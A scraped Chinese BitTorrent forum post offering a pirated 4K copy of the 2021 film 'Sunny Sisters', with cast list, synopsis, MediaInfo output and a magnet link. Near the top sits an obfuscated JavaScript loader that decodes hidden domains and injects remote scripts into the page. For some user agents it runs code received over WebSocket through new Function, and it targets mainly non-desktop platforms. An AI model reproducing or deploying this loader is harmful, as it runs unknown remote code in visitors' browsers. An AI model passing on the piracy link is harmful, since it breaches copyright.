阳光姐妹淘[国语音轨]Sunny.Sisters.2021.WEB-DL.4K.H265.AAC.5.1-迅雷下载 5.08GB

版主小s 13天前 258

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 阳光姐妹淘 / 中国版阳光姐妹淘 / Sunny Sisters

◎年 代 2021

◎产 地 中国大陆

◎类 别 喜剧

◎语 言 汉语普通话

◎上映日期 2021-06-11(中国大陆)

◎IMDb链接 https://www.imdb.com/title/tt14849368/

◎豆瓣评分 4.5/10 (18524人评价)

◎豆瓣链接 https://movie.douban.com/subject/26924143/

◎片 长 118分钟

◎导 演 包贝尔 Bei'er Bao (id:1315866)

◎编 剧 阿美 A Mei (id:1323030)

宋成魏 Chengwei Song (id:1456461)

◎演 员 殷桃 Tao Yin (id:1275049)

曾黎 Li Zeng (id:1053438)

张歆艺 Xinyi Zhang (id:1275455)

马苏 Su Ma (id:1275459)

倪虹洁 Hongjie Ni (id:1274649)

蒋小涵 Xiaohan Jiang (id:1313889)

王玥婷 Yueting Wang (id:1388376)

周洁琼 Pinky Zhou (id:1386550)

梁颂晴 Songqing Liang (id:1445042)

王清 Qing Wang (id:1434590)

杨晗 Han Yang (id:1395220)

夏梦 Meng Xia (id:1425529)

赵铭 Ming Zhao (id:1456196)

李子璇 Zixuan Li (id:1392262)

潘斌龙 Binlong Pan (id:1316365)

陈鹤一 Heyi Chen (id:1436017)

袁弘 Hong Yuan (id:1275443)

乔杉 Shan Qiao (id:1316368)

谭凯 Kai Tan (id:1275687)

柳小海 Xiaohai Liu (id:1318196)

代乐乐 Lele Dai (id:1275749)

李萍 Ping Li (id:1328349)

杨皓宇 Haoyu Yang (id:1318482)

西门飘飘 (id:1422159)

江易轩 Yixuan Jiang (id:1419325)

肖涵 Han Xiao (id:1314126)

王添羽 (id:1458967)

姜祉羽 Jiang Zhiyu (id:1458312)

◎标 签 友情 / 青春 / 翻拍 / 成长 / 校园 / 喜剧 / 感动 / 催泪

◎简 介

当年陪你走过青春的好朋友,后来还有联系吗?大家又各自过得好吗?家庭主妇张丽君在医院重逢了病重的高中好姐妹林青,林青希望离世前能跟当年的姐妹们重聚。于是,张丽君开启了寻找姐妹的旅程,这一路,大家找回了青春,也重新审视了当下生活。时间好快,人已长大,好想和你再相聚。

  1. General

  2. Unique ID : 173908230317116703711286139592098791113 (0x82D581BFE4BD9D0187C2FE9B63553EC9)

  3. Complete name : Sunny.Sisters.2021.WEB-DL.4K.H265.AAC.5.1-Dave.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 5.08 GiB

  7. Duration : 1 h 57 min

  8. Overall bit rate : 6 212 kb/s

  9. Encoded date : UTC 2021-07-11 08:31:19

  10. Writing application : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  11. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  12. Video

  13. ID : 1

  14. Format : HEVC

  15. Format/Info : High Efficiency Video Coding

  16. Format profile : [email protected]@Main

  17. Codec ID : V_MPEGH/ISO/HEVC

  18. Duration : 1 h 57 min

  19. Bit rate : 5 889 kb/s

  20. Width : 3 840 pixels

  21. Height : 1 626 pixels

  22. Display aspect ratio : 2.35:1

  23. Frame rate mode : Constant

  24. Frame rate : 24.000 FPS

  25. Color space : YUV

  26. Chroma subsampling : 4:2:0

  27. Bit depth : 8 bits

  28. Bits/(Pixel*Frame) : 0.039

  29. Stream size : 4.82 GiB (95%)

  30. Writing library : HW265_Code

  31. Default : Yes

  32. Forced : No

  33. Color range : Limited

  34. Matrix coefficients : BT.709


  35. Audio #1

  36. ID : 2

  37. Format : AAC LC SBR

  38. Format/Info : Advanced Audio Codec Low Complexity with Spectral Band Replication

  39. Commercial name : HE-AAC

  40. Format settings : NBC

  41. Codec ID : A_AAC-5

  42. Duration : 1 h 57 min

  43. Bit rate : 132 kb/s

  44. Channel(s) : 6 channels

  45. Channel layout : C L R Ls Rs LFE

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 23.438 FPS (2048 SPF)

  48. Compression mode : Lossy

  49. Stream size : 110 MiB (2%)

  50. Language : Chinese

  51. Default : Yes

  52. Forced : No


  53. Audio #2

  54. ID : 3

  55. Format : AAC LC

  56. Format/Info : Advanced Audio Codec Low Complexity

  57. Codec ID : A_AAC-2

  58. Duration : 1 h 57 min

  59. Bit rate : 192 kb/s

  60. Channel(s) : 2 channels

  61. Channel layout : L R

  62. Sampling rate : 48.0 kHz

  63. Frame rate : 46.875 FPS (1024 SPF)

  64. Compression mode : Lossy

  65. Stream size : 159 MiB (3%)

  66. Language : Chinese

  67. Default : No

  68. Forced : No


TAGS 喜剧

磁力链:
  • magnet:?xt=urn:btih:E0A071F799C15C56460779EFD566D91B95ABD124
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回